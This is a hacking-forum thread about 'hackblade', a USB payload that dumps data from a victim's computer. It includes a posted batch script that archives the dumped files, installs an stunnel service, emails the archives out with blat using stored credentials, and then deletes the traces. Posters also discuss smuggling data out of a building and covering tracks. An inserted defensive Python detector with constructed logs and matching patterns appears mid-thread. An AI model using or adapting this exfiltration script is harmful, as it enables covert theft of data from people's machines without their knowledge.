
hackblade.rar


setzer1411

  • 3 weeks later...
What, exactly, is so special about this particular payload?

It makes a logfile of the computer (same as switchblade) and emails it to you. It wouldn't be hard to write a similar thing up. I actually tried it once, but I couldn't get it to work.


I did it once, but later I realized that I'll have the dumped files twice.

Edit:

1. Copy all files from the sbs folder (except for example sbs.exe) to the dump folder

2. Create a new send.bat file (like from the hacksaw) and use this code:

@echo on
:start
SET emailto=
SET emailfrom=
SET password=
SET subject=dump.%date%.%computername%

rar.exe a dump.%date%.%computername%.rar -v1024k -vn .%date%.%computername%"

stunnel-4.11.exe -install -quiet 2>nul
net start stunnel 2>nul
GOTO sendfiles

:sendfiles
for %%i in (dump.*.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -s %subject% -server 127.0.0.1:1099
GOTO cleanup

:cleanup
net stop stunnel 2>nul 2>nul
stunnel-4.11.exe -uninstall -quiet 2>nul 2>nul
del /q /f dump.*.r*
GOTO end
:end

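Added example, not part of the thread: a defender-side Python sketch that correlates process-creation records for the three behaviours the send.bat above produces (split RAR archive, stunnel service install/start, blat mailing through a loopback relay). The `timestamp|host|command line` log format, the regexes, the 5-minute window and the host names are assumptions of this example, and the log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Stages mirror the commands in the quoted send.bat; the patterns themselves
# are this example's own and would need tuning against real telemetry.
STAGES = {
    "archive_split": re.compile(r"\brar(\.exe)?\s+a\s.*\s-v\d+", re.I),
    "tunnel_service": re.compile(r"stunnel\S*\s+-install\b|net\s+start\s+stunnel", re.I),
    "smtp_via_loopback": re.compile(r"\bblat(\.exe)?\s.*-server\s+127\.0\.0\.1(:\d+)?", re.I),
}
WINDOW = timedelta(minutes=5)  # assumed correlation window

# Constructed sample records: timestamp|host|command line
SAMPLE_LOG = """\
2024-01-10T09:00:01|WS-014|rar.exe a dump.WS-014.rar -v1024k -vn dump
2024-01-10T09:00:09|WS-014|stunnel-4.11.exe -install -quiet
2024-01-10T09:00:10|WS-014|net start stunnel
2024-01-10T09:00:12|WS-014|blat.exe dump.WS-014.rar -base64 -to a@example.com -server 127.0.0.1:1099
2024-01-10T10:15:00|WS-020|rar.exe a backup.rar -v2048k docs
2024-01-10T08:00:00|WS-031|rar.exe a logs.rar -v1024k logs
2024-01-10T11:30:00|WS-031|blat.exe report.txt -to ops@example.com -server 127.0.0.1:1099
"""

def stages_hit(cmd):
    """Names of the stages whose pattern matches one command line."""
    return {name for name, rx in STAGES.items() if rx.search(cmd)}

def detect(log_text, min_stages=2):
    """Map host -> sorted stages when >= min_stages distinct stages fall inside WINDOW."""
    by_host = {}
    for line in filter(str.strip, log_text.splitlines()):
        ts, host, cmd = line.split("|", 2)
        for stage in stages_hit(cmd):
            by_host.setdefault(host, []).append((datetime.fromisoformat(ts), stage))
    alerts = {}
    for host, hits in by_host.items():
        for start, _ in hits:
            # Distinct stages seen from this event up to WINDOW later
            seen = {s for t, s in hits if timedelta(0) <= t - start <= WINDOW}
            if len(seen) >= min_stages:
                alerts[host] = sorted(seen)
                break
    return alerts

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

A single stage on its own (WS-020's split backup archive) is not flagged, and neither are stages that occur hours apart (WS-031); only the combination inside the window is.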

What, exactly, is so special about this particular payload?

It makes a logfile of the computer (same as switchblade) and emails it to you. It wouldn't be hard to write a similar thing up. I actually tried it once, but I couldn't get it to work.

Wouldn't this be less effective? If it were to infect the computer quicker than dumping, it would only be slightly quicker, and I know using rar uses up a lot more system resources than dumping, so it would be detected more easily.


But if you have to smuggle the dumped information out of a $building, it wouldn't be bad having a copy on a mailserver.

If you have to do that then you obviously would need something that covers its tracks a lot better.

